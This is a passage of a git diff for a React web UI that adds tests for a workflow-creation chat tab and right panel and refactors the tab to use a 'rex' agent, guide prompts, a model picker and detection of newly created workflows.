+        'create.chat.sessionTitle': '新建工作流',
+        'create.chat.inputPlaceholder': '描述您想创建的工作流...',
+        'create.chat.contextMessage': '用户希望创建一个 Flocks 工作流，请使用 workflow-builder skill 来完成。',
+        'create.chat.welcomeMessage': '欢迎创建工作流',
+        'create.chat.emptyStateTitle': '暂无执行记录',
+        'create.chat.guidePanelTitle': 'Rex 辅助创建',
+        'create.chat.guidePanelDesc': '选择一个引导或创建案例，Rex 会按 workflow-builder skill 先确认场景。',
+        'create.chat.guideSectionTitle': '创建引导',
+        'create.chat.caseSectionTitle': '创建案例',
+        'create.chat.guideActions': [
+          {
+            label: '如何创建工作流',
+            description: '从零开始梳理业务目标、输入输出、节点流程、样例和生成步骤。',
+            prompt: '请按 workflow-builder skill 引导我从零创建一个 Flocks 工作流。',
+          },
+          {
+            label: '编辑工作流节点',
+            description: '调整节点职责、输入输出、代码或连接关系。',
+            prompt: '请帮我编辑工作流节点。',
+          },
+        ],
+        'create.chat.exampleQuestions': [
+          '帮我创建一个 IP 威胁情报查询工作流，输入 IP 地址，查询多个情报源并汇总生成报告',
+          '创建一个域名分析工作流，对域名进行 WHOIS 查询、DNS 解析和历史记录交叉分析',
+        ],
+        'create.chat.exampleQuestionLabels': [
+          '创建 IP 情报工作流',
+          '创建域名分析工作流',
+        ],
+        'detail.chat.welcome.guideCollapse': '收起',
+        'detail.chat.welcome.guideExpand': '展开',
+      };
+      const value = translations[key] ?? key;
+      return options?.returnObjects ? value : String(value);
+    },
+  }),
+}));
+
+// Renders CreateChatTab inside a MemoryRouter; `props` override the default mock callback.
+function renderCreateChatTab(props?: Partial<ComponentProps<typeof CreateChatTab>>) {
+  const tab = <CreateChatTab onWorkflowCreated={vi.fn()} {...props} />;
+  const tree = <MemoryRouter>{tab}</MemoryRouter>;
+
+  return render(tree);
+}
+
+describe('WorkflowCreate CreateChatTab', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    capturedSessionChatProps.length = 0;
+    mockCreateAndSend.mockResolvedValue('session-1');
+    vi.mocked(workflowAPI.list).mockResolvedValue({ data: [] });
+    vi.mocked(workflowAPI.get).mockResolvedValue({ data: null as any });
+  });
+
+  it('renders creation guides and case examples in a centered guide panel', async () => {
+    const user = userEvent.setup();
+    renderCreateChatTab();
+
+    expect(capturedSessionChatProps[0].suggestions).toBeUndefined();
+    expect(screen.getByText('暂无执行记录')).toBeInTheDocument();
+    expect(screen.getByText('Rex 辅助创建')).toBeInTheDocument();
+    expect(screen.getByText('创建引导')).toBeInTheDocument();
+    expect(screen.getByText('创建案例')).toBeInTheDocument();
+    expect(screen.getByTestId('create-workflow-guide-scroll')).toHaveClass('overflow-y-auto');
+    expect(screen.getByRole('button', { name: /如何创建工作流/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /编辑工作流节点/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /创建 IP 情报工作流/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /创建域名分析工作流/ })).toBeInTheDocument();
+    expect(screen.queryByText('帮我创建一个 IP 威胁情报查询工作流，输入 IP 地址，查询多个情报源并汇总生成报告')).not.toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /如何创建工作流/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith({
+        text: '请按 workflow-builder skill 引导我从零创建一个 Flocks 工作流。',
+        imageParts: [],
+        agent: 'rex',
+        model: selectedPromptModel,
+        displayText: '@@flocks-instruction:如何创建工作流',
+      });
+    });
+    expect(mockSendPrompt).not.toHaveBeenCalled();
+  });
+
+  it('shows the guide dock above the composer once creation starts', () => {
+    renderCreateChatTab();
+    const firstProps = capturedSessionChatProps[0];
+    const slotContext = {
+      sendPrompt: mockSendPrompt,
+      setInput: vi.fn(),
+      focusInput: vi.fn(),
+      sending: true,
+      streaming: false,
+      sessionId: null,
+    };
+    const dock = within(render(<>{firstProps.conversationBottomSlot?.(slotContext)}</>).container);
+    // With `sending: true` both quick-action buttons must be disabled.
+    expect(dock.getByRole('button', { name: /如何创建工作流/ })).toBeDisabled();
+    expect(dock.getByRole('button', { name: /创建 IP 情报工作流/ })).toBeDisabled();
+  });
+
+  it('reuses the workflow workbench chat controls', async () => {
+    renderCreateChatTab();
+
+    expect(screen.getByText('Agent:rex')).toBeInTheDocument();
+    expect(screen.getByText('ModelPicker')).toBeInTheDocument();
+    expect(capturedSessionChatProps[0].agentName).toBe('rex');
+    expect(capturedSessionChatProps[0].mentionAgents.map((agent: any) => agent.name)).toEqual(['rex']);
+    expect(capturedSessionChatProps[0].model).toEqual(selectedPromptModel);
+    expect(capturedSessionChatProps[0].supportsVision).toBe(true);
+    expect(capturedSessionChatProps[0].contextWindowTokens).toBe(128000);
+    expect(capturedSessionChatProps[0].display).toEqual({
+      collapseIntermediateSteps: true,
+      processGroupsDefaultOpen: false,
+    });
+    expect(capturedSessionChatProps[0].composerTextareaMinHeight).toBe(48);
+    expect(capturedSessionChatProps[0].composerTextareaMaxHeight).toBe(120);
+
+    await capturedSessionChatProps[0].onCreateAndSend(
+      '创建一个工作流',
+      [],
+      undefined,
+      undefined,
+      { displayText: '@@flocks-instruction:IP 情报' },
+    );
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith({
+        text: '创建一个工作流',
+        imageParts: [],
+        agent: 'rex',
+        model: selectedPromptModel,
+        displayText: '@@flocks-instruction:IP 情报',
+      });
+    });
+  });
+
+  it('resumes a persisted create session', () => {
+    const restoredSessionId = 'session-restored';
+    const onSessionChange = vi.fn();
+    renderCreateChatTab({ initialSessionId: restoredSessionId, onSessionChange });
+
+    // The restored id reaches SessionChat, no welcome content is passed, and the callback is notified.
+    const firstProps = capturedSessionChatProps[0];
+    expect(firstProps.sessionId).toBe(restoredSessionId);
+    expect(firstProps.welcomeContent).toBeUndefined();
+    expect(onSessionChange).toHaveBeenCalledWith(restoredSessionId);
+  });
+
+  it('does not attach an already-known workflow just because it was created recently', async () => {
+    const creationStartedAt = Date.now();
+    const recentKnownWorkflow = {
+      id: 'previous-workflow',
+      name: 'Previous Workflow',
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt - 1000,
+      updatedAt: creationStartedAt - 1000,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    vi.mocked(workflowAPI.list).mockResolvedValue({ data: [recentKnownWorkflow] });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(1);
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onStreamingDone?.();
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(2);
+    });
+    expect(onWorkflowCreated).not.toHaveBeenCalled();
+  });
+
+  it('attaches the workflow identified by a workflow.created SSE event', async () => {
+    const creationStartedAt = Date.now();
+    const createdWorkflow = {
+      id: 'created-by-this-event',
+      name: 'Created By This Event',
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt + 100,
+      updatedAt: creationStartedAt + 100,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    vi.mocked(workflowAPI.get).mockResolvedValue({ data: createdWorkflow });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(1);
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onSSEEvent?.({
+      type: 'workflow.created',
+      properties: { id: 'created-by-this-event' },
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.get).toHaveBeenCalledWith('created-by-this-event');
+    });
+    expect(onWorkflowCreated).toHaveBeenCalledWith(createdWorkflow);
+  });
+
+  it('replays workflow.created events that arrive before the initial snapshot is ready', async () => {
+    const creationStartedAt = Date.now();
+    const createdWorkflow = {
+      id: 'created-before-snapshot-ready',
+      name: 'Created Before Snapshot Ready',
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt + 100,
+      updatedAt: creationStartedAt + 100,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    let resolveSnapshot: ((value: { data: typeof createdWorkflow[] }) => void) | undefined;
+    vi.mocked(workflowAPI.list).mockReturnValueOnce(new Promise((resolve) => {
+      resolveSnapshot = resolve;
+    }) as any);
+    vi.mocked(workflowAPI.get).mockResolvedValue({ data: createdWorkflow });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onSSEEvent?.({
+      type: 'workflow.created',
+      properties: { id: 'created-before-snapshot-ready' },
+    });
+
+    expect(workflowAPI.get).not.toHaveBeenCalled();
+
+    await act(async () => {
+      resolveSnapshot?.({ data: [createdWorkflow] });
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.get).toHaveBeenCalledWith('created-before-snapshot-ready');
+    });
+    expect(onWorkflowCreated).toHaveBeenCalledWith(createdWorkflow);
+  });
+
+  it('does not guess when fallback polling sees multiple fresh workflows', async () => {
+    const creationStartedAt = Date.now();
+    const makeWorkflow = (id: string) => ({
+      id,
+      name: id,
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt + 100,
+      updatedAt: creationStartedAt + 100,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    });
+    vi.mocked(workflowAPI.list)
+      .mockResolvedValueOnce({ data: [] })
+      .mockResolvedValueOnce({ data: [makeWorkflow('first'), makeWorkflow('second')] });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(1);
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onStreamingDone?.();
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(2);
+    });
+    expect(onWorkflowCreated).not.toHaveBeenCalled();
+  });
+});
diff --git a/webui/src/pages/WorkflowCreate/CreateChatTab.tsx b/webui/src/pages/WorkflowCreate/CreateChatTab.tsx
index 5638627bb..d569b72bb 100644
--- a/webui/src/pages/WorkflowCreate/CreateChatTab.tsx
+++ b/webui/src/pages/WorkflowCreate/CreateChatTab.tsx
@@ -1,80 +1,232 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
-import { AlertCircle } from 'lucide-react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
+import { AlertCircle, Bot } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
-import SessionChat, { type SSEChatEvent } from '@/components/common/SessionChat';
+import SessionChat, {
+  buildInstructionDisplayText,
+  type PromptDisplayOptions,
+  type SSEChatEvent,
+} from '@/components/common/SessionChat';
+import {
+  ChatAgentDisplay,
+  ChatModelPicker,
+  useChatAgentOptions,
+  useChatModelOptions,
+} from '@/components/common/ChatPromptSelectors';
+import ChatGuideDock, { type ChatGuideAction } from '@/components/common/ChatGuideDock';
+import GuidedCreatePanel from '@/components/common/GuidedCreatePanel';
 import { useSessionChat } from '@/hooks/useSessionChat';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
 import { workflowAPI, Workflow } from '@/api/workflow';
+import type { ImagePartData } from '@/utils/imageUpload';
 
 const FALLBACK_POLL_MS = 10_000;
+const WORKFLOW_CHAT_AGENT_NAME = 'rex';
+const WORKFLOW_CHAT_AGENT_NAMES = [WORKFLOW_CHAT_AGENT_NAME];
 
 interface CreateChatTabProps {
   onWorkflowCreated: (workflow: Workflow) => void;
+  initialSessionId?: string | null;
+  creationStartedAt?: number;
+  onSessionChange?: (sessionId: string | null) => void;
+  launchRequest?: CreateWorkflowChatLaunchRequest | null;
+  onLaunchRequestHandled?: (id: number) => void;
 }
 
-export default function CreateChatTab({ onWorkflowCreated }: CreateChatTabProps) {
+export interface CreateWorkflowChatLaunchRequest {
+  id: number;
+  prompt: string;
+  displayLabel?: string;
+}
+
+// Converts an untyped translation payload into guide actions. Non-object entries and entries
+// whose label or prompt is blank are dropped; a blank description falls back to the prompt.
+function normalizeGuideActions(value: unknown): ChatGuideAction[] {
+  const actions: ChatGuideAction[] = [];
+  if (!Array.isArray(value)) return actions;
+  const readText = (field: unknown) => String(field ?? '').trim();
+  for (const entry of value) {
+    if (!entry || typeof entry !== 'object') continue;
+    const fields = entry as Record<string, unknown>;
+    const label = readText(fields.label);
+    const description = readText(fields.description);
+    const prompt = readText(fields.prompt);
+    const group = readText(fields.group);
+    if (label === '' || prompt === '') continue;
+    const action = { label, description: description || prompt, prompt };
+    actions.push(group ? { ...action, group } : action);
+  }
+
+  return actions;
+}
+
+export default function CreateChatTab({
+  onWorkflowCreated,
+  initialSessionId = null,
+  creationStartedAt,
+  onSessionChange,
+  launchRequest,
+  onLaunchRequestHandled,
+}: CreateChatTabProps) {
   const { t } = useTranslation('workflow');
-  const supportsVision = useDefaultModelVision();
+  const defaultSupportsVision = useDefaultModelVision();
+  const guideSectionTitle = t('create.chat.guideSectionTitle');
+  const caseSectionTitle = t('create.chat.caseSectionTitle');
 
+  const guideActions = useMemo(() => (
+    normalizeGuideActions(t('create.chat.guideActions', { returnObjects: true }))
+      .map((action) => ({ ...action, group: guideSectionTitle }))
+  ), [guideSectionTitle, t]);
   const exampleQuestions = t('create.chat.exampleQuestions', { returnObjects: true }) as string[];
+  const exampleQuestionLabels = t('create.chat.exampleQuestionLabels', { returnObjects: true }) as string[];
+  const { agents: workflowChatAgents } = useChatAgentOptions({
+    allowedAgentNames: WORKFLOW_CHAT_AGENT_NAMES,
+  });
+  const {
+    groupedOptions: groupedChatModelOptions,
+    loading: loadingChatModels,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  } = useChatModelOptions();
+  const supportsVision = selectedModelOption?.supportsVision ?? defaultSupportsVision;
+  const exampleActions = useMemo(() => (
+    (Array.isArray(exampleQuestions) ? exampleQuestions : []).map((question, index) => ({
+      label: Array.isArray(exampleQuestionLabels) && exampleQuestionLabels[index]
+        ? exampleQuestionLabels[index]
+        : question,
+      description: question,
+      prompt: question,
+      group: caseSectionTitle,
+    }))
+  ), [caseSectionTitle, exampleQuestionLabels, exampleQuestions]);
+  const quickActions = useMemo(() => (
+    [...guideActions, ...exampleActions]
+  ), [exampleActions, guideActions]);
 
   const { sessionId, error, createAndSend, retry } = useSessionChat({
     title: t('create.chat.sessionTitle'),
     category: 'workflow',
     contextMessage: t('create.chat.contextMessage'),
     welcomeMessage: t('create.chat.welcomeMessage'),
+    initialSessionId,
   });
 
   const knownIdsRef = useRef<Set<string>>(new Set());
+  const snapshotStartedAtRef = useRef<number | null>(null);
   const createdWorkflowRef = useRef<string | null>(null);
+  const pendingWorkflowEventIdsRef = useRef<Set<string>>(new Set());
+  const pendingDetectionRef = useRef(false);
   const [snapshotReady, setSnapshotReady] = useState(false);
   const onWorkflowCreatedRef = useRef(onWorkflowCreated);
   onWorkflowCreatedRef.current = onWorkflowCreated;
 
+  useEffect(() => {
+    onSessionChange?.(sessionId ?? null);
+  }, [onSessionChange, sessionId]);
+
   // Snapshot existing workflow IDs on mount
   useEffect(() => {
     (async () => {
+      setSnapshotReady(false);
+      const snapshotStartedAt = Date.now();
+      const freshBoundary = Math.max(creationStartedAt ?? 0, snapshotStartedAt) - 500;
+      snapshotStartedAtRef.current = snapshotStartedAt;
       try {
         const snap = await workflowAPI.list();
-        knownIdsRef.current = new Set((snap.data as Workflow[]).map((w) => w.id));
+        knownIdsRef.current = new Set((snap.data as Workflow[])
+          .filter((w) => {
+            const createdAt = Number(w.createdAt ?? 0);
+            return !(createdAt > 0 && createdAt >= freshBoundary);
+          })
+          .map((w) => w.id));
       } catch {
         knownIdsRef.current = new Set();
       }
       setSnapshotReady(true);
     })();
-  }, []);
+  }, [creationStartedAt]);
 
-  // Check for new workflows (used by both SSE and polling)
+  const attachCreatedWorkflow = useCallback((workflow?: Workflow | null): boolean => {
+    if (!workflow?.id || !snapshotReady) return false;
+    if (knownIdsRef.current.has(workflow.id) || workflow.id === createdWorkflowRef.current) {
+      return false;
+    }
+    const createdAt = Number(workflow.createdAt ?? 0);
+    const startedAt = Math.max(creationStartedAt ?? 0, snapshotStartedAtRef.current ?? 0);
+    if (startedAt > 0 && createdAt > 0 && createdAt < startedAt - 500) {
+      return false;
+    }
+    createdWorkflowRef.current = workflow.id;
+    onWorkflowCreatedRef.current(workflow);
+    return true;
+  }, [creationStartedAt, snapshotReady]);
+
+  const attachCreatedWorkflowById = useCallback(async (workflowId: string) => {
+    if (!workflowId) return;
+    if (!snapshotReady) {
+      pendingWorkflowEventIdsRef.current.add(workflowId);
+      return;
+    }
+    try {
+      const res = await workflowAPI.get(workflowId);
+      attachCreatedWorkflow(res.data);
+    } catch {
+      // The workflow file may still be settling; polling can recover it.
+    }
+  }, [attachCreatedWorkflow, snapshotReady]);
+
+  // Check for new workflows (used by fallback polling and post-stream refresh)
   const detectNewWorkflow = useCallback(async () => {
-    if (!snapshotReady) return;
+    if (!snapshotReady) {
+      pendingDetectionRef.current = true;
+      return;
+    }
     try {
       const res = await workflowAPI.list();
       const workflows: Workflow[] = res.data;
-      const fresh = workflows.find(
-        (w) =>
-          !knownIdsRef.current.has(w.id) &&
-          w.id !== createdWorkflowRef.current,
-      );
-      if (fresh) {
-        createdWorkflowRef.current = fresh.id;
-        onWorkflowCreatedRef.current(fresh);
+      const sortedWorkflows = [...workflows].sort((a, b) => Number(b.createdAt ?? 0) - Number(a.createdAt ?? 0));
+      const startedAt = Math.max(creationStartedAt ?? 0, snapshotStartedAtRef.current ?? 0);
+      const freshCandidates = sortedWorkflows.filter((w) => {
+        if (knownIdsRef.current.has(w.id) || w.id === createdWorkflowRef.current) return false;
+        const createdAt = Number(w.createdAt ?? 0);
+        return !(startedAt > 0 && createdAt > 0 && createdAt < startedAt - 500);
+      });
+      if (freshCandidates.length === 1) {
+        attachCreatedWorkflow(freshCandidates[0]);
       }
     } catch { /* ignore */ }
-  }, [snapshotReady]);
+  }, [attachCreatedWorkflow, creationStartedAt, snapshotReady]);
+
+  useEffect(() => {
+    if (!snapshotReady) return;
+
+    if (pendingWorkflowEventIdsRef.current.size > 0) {
+      const ids = Array.from(pendingWorkflowEventIdsRef.current);
+      pendingWorkflowEventIdsRef.current.clear();
+      ids.forEach((id) => {
+        void attachCreatedWorkflowById(id);
+      });
+    }
+
+    if (pendingDetectionRef.current) {
+      pendingDetectionRef.current = false;
+      void detectNewWorkflow();
+    }
+  }, [attachCreatedWorkflowById, detectNewWorkflow, snapshotReady]);
 
   // SSE: react to workflow.created events immediately
   const handleSSEEvent = useCallback(
     (event: SSEChatEvent) => {
       if (event.type === 'workflow.created' && event.properties?.id) {
-        detectNewWorkflow();
+        void attachCreatedWorkflowById(String(event.properties.id));
       }
     },
-    [detectNewWorkflow],
+    [attachCreatedWorkflowById],
   );
 
   // Primary: check right after AI finishes streaming
   const handleStreamingDone = useCallback(() => {
-    detectNewWorkflow();
+    void detectNewWorkflow();
   }, [detectNewWorkflow]);
 
   // Fallback polling for filesystem-driven creation (Rex writes directly)
@@ -85,6 +237,33 @@ export default function CreateChatTab({ onWorkflowCreated }: CreateChatTabProps)
     return () => clearInterval(timer);
   }, [sessionId, snapshotReady, detectNewWorkflow]);
 
+  const handleCreateAndSend = useCallback(
+    async (
+      text: string,
+      imageParts?: ImagePartData[],
+      agentOverride?: string,
+      modelOverride?: { providerID: string; modelID: string } | null,
+      options?: PromptDisplayOptions,
+    ) => {
+      await createAndSend({
+        text,
+        imageParts,
+        agent: agentOverride || WORKFLOW_CHAT_AGENT_NAME,
+        model: modelOverride === undefined ? selectedPromptModel : modelOverride,
+        displayText: options?.displayText,
+      });
+    },
+    [createAndSend, selectedPromptModel],
+  );
+
+  const handleWelcomeGuidePrompt = useCallback(
+    (prompt: string, label: string) => {
+      void handleCreateAndSend(prompt, [], undefined, undefined, {
+        displayText: buildInstructionDisplayText(label),
+      });
+    },
+    [handleCreateAndSend],
+  );
 
   if (error) {
     return (
@@ -109,12 +288,88 @@ export default function CreateChatTab({ onWorkflowCreated }: CreateChatTabProps)
       live={!!sessionId}
       placeholder={t('create.chat.inputPlaceholder')}
       className="h-full"
-      suggestions={exampleQuestions}
+      display={{ collapseIntermediateSteps: true, processGroupsDefaultOpen: false }}
+      agentName={WORKFLOW_CHAT_AGENT_NAME}
+      mentionAgents={workflowChatAgents}
       supportsVision={supportsVision}
+      contextWindowTokens={selectedModelOption?.contextWindowTokens ?? null}
+      model={selectedPromptModel}
       onStreamingDone={handleStreamingDone}
       onSSEEvent={handleSSEEvent}
-      onCreateAndSend={!sessionId ? (text, imageParts) => createAndSend({ text, imageParts }) : undefined}
+      onCreateAndSend={!sessionId ? handleCreateAndSend : undefined}
+      welcomeContent={!sessionId ? (
+        <GuidedCreatePanel
+          emptyTitle={t('create.chat.emptyStateTitle')}
+          icon={<Bot className="h-5 w-5" />}
+          title={t('create.chat.guidePanelTitle')}
+          description={t('create.chat.guidePanelDesc')}
+          groups={[
+            { title: t('create.chat.guideSectionTitle'), actions: guideActions },
+            { title: t('create.chat.caseSectionTitle'), actions: exampleActions },
+          ]}
+          scrollTestId="create-workflow-guide-scroll"
+          onStartPrompt={handleWelcomeGuidePrompt}
+        />
+      ) : undefined}
+      composerTextareaMinHeight={48}
+      composerTextareaMaxHeight={120}
+      toolbarSlot={
+        <ChatAgentDisplay
+          agents={workflowChatAgents}
+          selectedAgent={WORKFLOW_CHAT_AGENT_NAME}
+        />
+      }
+      centerToolbarSlot={
+        <ChatModelPicker
+          groupedOptions={groupedChatModelOptions}
+          loading={loadingChatModels}
+          selectedModelOption={selectedModelOption}
+          onSelectModel={(option) => setSelectedModelKey(option.key)}
+        />
+      }
+      conversationBottomSlot={({ sendPrompt, sending, streaming }) => (
+        <>
+          <CreateWorkflowLaunchRequestRunner
+            launchRequest={launchRequest}
+            onLaunchRequestHandled={onLaunchRequestHandled}
+            onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+              displayText: label ? buildInstructionDisplayText(label) : undefined,
+            })}
+          />
+          {sessionId || sending || streaming ? (
+            <ChatGuideDock
+              actions={quickActions}
+              disabled={sending || streaming}
+              collapseTitle={t('detail.chat.welcome.guideCollapse')}
+              expandTitle={t('detail.chat.welcome.guideExpand')}
+              onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+                displayText: buildInstructionDisplayText(label),
+              })}
+            />
+          ) : null}
+        </>
+      )}
     />
   );
 }
 
+// Renders nothing; forwards a launch request to `onStartPrompt` unless its id is the one dispatched last.
+function CreateWorkflowLaunchRequestRunner(props: {
+  launchRequest?: CreateWorkflowChatLaunchRequest | null;
+  onLaunchRequestHandled?: (id: number) => void;
+  onStartPrompt: (text: string, label?: string) => void;
+}) {
+  const { launchRequest, onLaunchRequestHandled, onStartPrompt } = props;
+  // Id of the last request dispatched by this instance; stops re-dispatch when the effect re-runs.
+  const lastDispatchedIdRef = useRef<number | null>(null);
+
+  useEffect(() => {
+    if (!launchRequest) return;
+    const { id, prompt, displayLabel } = launchRequest;
+    if (lastDispatchedIdRef.current === id) return;
+    lastDispatchedIdRef.current = id; // recorded before the callbacks run
+    onStartPrompt(prompt, displayLabel);
+    onLaunchRequestHandled?.(id);
+  }, [launchRequest, onLaunchRequestHandled, onStartPrompt]);
+  return null;
+}
diff --git a/webui/src/pages/WorkflowCreate/CreateRightPanel.test.tsx b/webui/src/pages/WorkflowCreate/CreateRightPanel.test.tsx
new file mode 100644
index 000000000..e439f4181
--- /dev/null
+++ b/webui/src/pages/WorkflowCreate/CreateRightPanel.test.tsx
@@ -0,0 +1,164 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import type { Workflow } from '@/api/workflow';
+import CreateRightPanel from './CreateRightPanel';
+
+const { capturedCreateChatTabProps, capturedIntegrationTabProps } = vi.hoisted(() => ({ // built via vi.hoisted so the vi.mock factories below can reference them
+  capturedCreateChatTabProps: [] as any[],
+  capturedIntegrationTabProps: [] as any[],
+}));
+
+vi.mock('./CreateChatTab', () => ({ // stub chat tab: records each props object it is rendered with
+  default: (props: any) => {
+    capturedCreateChatTabProps.push(props);
+    return <div>Workbench content</div>;
+  },
+}));
+
+vi.mock('./CreateOverviewTab', () => ({ // stub overview tab: static marker text only
+  default: () => <div>Overview content</div>,
+}));
+
+vi.mock('../WorkflowDetail/tabs/IntegrationTab', () => ({ // stub publish tab: records props and exposes a button that fires onGuidePrompt
+  default: ({ workflow, onGuidePrompt }: { workflow: Workflow; onGuidePrompt?: (prompt: string, label: string) => void }) => {
+    capturedIntegrationTabProps.push({ workflow, onGuidePrompt });
+    return (
+      <div>
+        <div>Publish content for {workflow.id}</div>
+        <button
+          type="button"
+          onClick={() => onGuidePrompt?.('publish api prompt', '发布为 API')}
+        >
+          发布为 API
+        </button>
+      </div>
+    );
+  },
+}));
+
+vi.mock('react-i18next', () => ({ // stub i18n: fixed lookup table, unknown keys are returned unchanged
+  useTranslation: () => ({
+    t: (key: string) => {
+      const translations: Record<string, string> = {
+        'create.rightPanel.tabOverview': '详情',
+        'create.rightPanel.tabChat': '工作台',
+        'create.rightPanel.tabIntegration': '发布',
+        'create.publish.emptyTitle': '等待生成工作流',
+        'create.publish.emptyHint': '工作流生成后，可以在这里配置发布方式。',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+const workflow: Workflow = { // fixture used by the tests that render the panel with an existing workflow
+  id: 'generated_workflow',
+  name: 'Generated Workflow',
+  category: 'default',
+  status: 'draft',
+  source: 'project',
+  createdAt: 1,
+  updatedAt: 1,
+  workflowJson: {
+    start: 'start',
+    nodes: [],
+    edges: [],
+  },
+  stats: {
+    callCount: 0,
+    successCount: 0,
+    errorCount: 0,
+    totalRuntime: 0,
+    avgRuntime: 0,
+    thumbsUp: 0,
+    thumbsDown: 0,
+  },
+};
+
+describe('WorkflowCreate CreateRightPanel', () => { // tab behaviour of the create-page right panel, with all three tab bodies mocked
+  beforeEach(() => { // empty the capture arrays in place so each test only sees its own renders
+    capturedCreateChatTabProps.length = 0;
+    capturedIntegrationTabProps.length = 0;
+  });
+
+  it('opens on the workbench tab and exposes a publish tab', () => {
+    render(
+      <CreateRightPanel
+        workflow={null}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: '详情' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '工作台' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.getByText('Workbench content')).toBeInTheDocument(); // the mocked chat tab is what renders initially
+  });
+
+  it('shows a publish placeholder before the workflow is generated', async () => {
+    const user = userEvent.setup();
+    render(
+      <CreateRightPanel
+        workflow={null}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+
+    expect(screen.getByText('等待生成工作流')).toBeInTheDocument();
+    expect(screen.getByText('工作流生成后，可以在这里配置发布方式。')).toBeInTheDocument();
+  });
+
+  it('reuses the workflow publish tab after generation', async () => {
+    const user = userEvent.setup();
+    render(
+      <CreateRightPanel
+        workflow={workflow}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+
+    expect(screen.getByText('Publish content for generated_workflow')).toBeInTheDocument();
+    expect(capturedIntegrationTabProps[capturedIntegrationTabProps.length - 1].onGuidePrompt).toEqual(expect.any(Function)); // the panel must wire a guide-prompt handler into the publish tab
+  });
+
+  it('routes publish guide prompts back into the current workbench session', async () => {
+    const user = userEvent.setup();
+    const onLaunchRequestHandled = vi.fn();
+    render(
+      <CreateRightPanel
+        workflow={workflow}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+        initialChatSessionId="session-existing"
+        onChatLaunchRequestHandled={onLaunchRequestHandled}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+    await user.click(screen.getByRole('button', { name: '发布为 API' })); // the mocked publish tab fires onGuidePrompt from this button
+
+    expect(screen.getByText('Workbench content')).toBeInTheDocument(); // the panel switched back to the chat tab
+    const latestChatProps = capturedCreateChatTabProps[capturedCreateChatTabProps.length - 1];
+    expect(latestChatProps.initialSessionId).toBe('session-existing');
+    expect(latestChatProps.launchRequest).toMatchObject({
+      prompt: 'publish api prompt',
+      displayLabel: '发布为 API',
+    });
+
+    latestChatProps.onLaunchRequestHandled(latestChatProps.launchRequest.id); // simulate the chat tab acknowledging the request
